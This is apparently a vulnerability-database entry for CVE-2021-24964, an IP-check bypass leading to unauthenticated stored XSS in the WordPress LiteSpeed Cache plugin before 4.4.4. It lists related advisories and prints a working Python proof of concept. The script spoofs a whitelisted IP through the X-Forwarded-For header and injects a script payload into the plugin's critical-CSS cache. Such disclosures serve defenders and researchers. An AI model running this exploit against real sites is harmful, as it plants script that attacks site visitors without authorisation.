LiteSpeed Cache < 4.4.4 - IP Check Bypass to Unauthenticated Stored XSS. "Load CSS Asynchronously" setting required
Reporter | Title | Published | Views | Family All 8 |
---|---|---|---|---|
![]() | WordPress LiteSpeed Cache plugin cross-site scripting vulnerability | 6 Jan 202200:00 | – | cnvd |
![]() | Cross site scripting | 3 Jan 202213:15 | – | prion |
![]() | LiteSpeed Cache < 4.4.4 - IP Check Bypass to Unauthenticated Stored XSS | 30 Nov 202100:00 | – | wpvulndb |
![]() | CVE-2021-24964 | 3 Jan 202213:15 | – | cve |
![]() | CVE-2021-24964 | 3 Jan 202213:15 | – | nvd |
![]() | WordPress LiteSpeed Cache plugin <= 4.4.3 - IP Check Bypass to Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability | 30 Nov 202100:00 | – | patchstack |
![]() | CVE-2021-24964 LiteSpeed Cache < 4.4.4 - IP Check Bypass to Unauthenticated Stored XSS | 3 Jan 202212:49 | – | cvelist |
![]() | WordPress LiteSpeed Cache Plugin < 4.4.4 Multiple Vulnerabilities | 24 Jun 202200:00 | – | openvas |
The "Load CSS Asynchronously" setting in the Page Optimization (/wp-admin/admin.php?page=litespeed-page_optm) needs to be turned on for this to work
#!/bin/python3
import requests
import json
def get_whitelist_ips():
return requests.get("https://quic.cloud/ips", verify=False).text
print("[+] Getting the whitelisted ips...")
whitelist_ip = get_whitelist_ips().split("<br />")[0]
print(f"[+] Using {whitelist_ip}")
payload = "</style><script>alert(/XSS-cache/);</script>"
site = "https://example.com"
def poison(poison_keys, whitelist_ip):
for poison_key in poison_keys:
obj = {
"status": "done",
"data": {}
}
obj['data'][poison_key] = payload
res = requests.post(f"{site}/wp-json/litespeed/v1/notify_ccss", data=json.dumps(obj), headers={"X-Forwarded-For": whitelist_ip}, verify=False).json()
if res['count'] == 1:
print(f"We have successfully poisoned the {poison_key} key!")
else:
print(f"Failed to poison the {poison_key} key")
def get_keys_from_ccss(res):
obj = json.loads(res)
return [key for key in obj.keys() if "litespeed_conf.dat" not in obj[key]['url']]
while True:
res = requests.get(f"{site}/wp-content/litespeed/ccss/.litespeed_conf.dat", verify=False).text
#print("Waiting for ccss queue file to show up...")
if '","user_agent":"' in res:
#print(res)
poison_keys = get_keys_from_ccss(res)
poison(poison_keys, whitelist_ip)
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo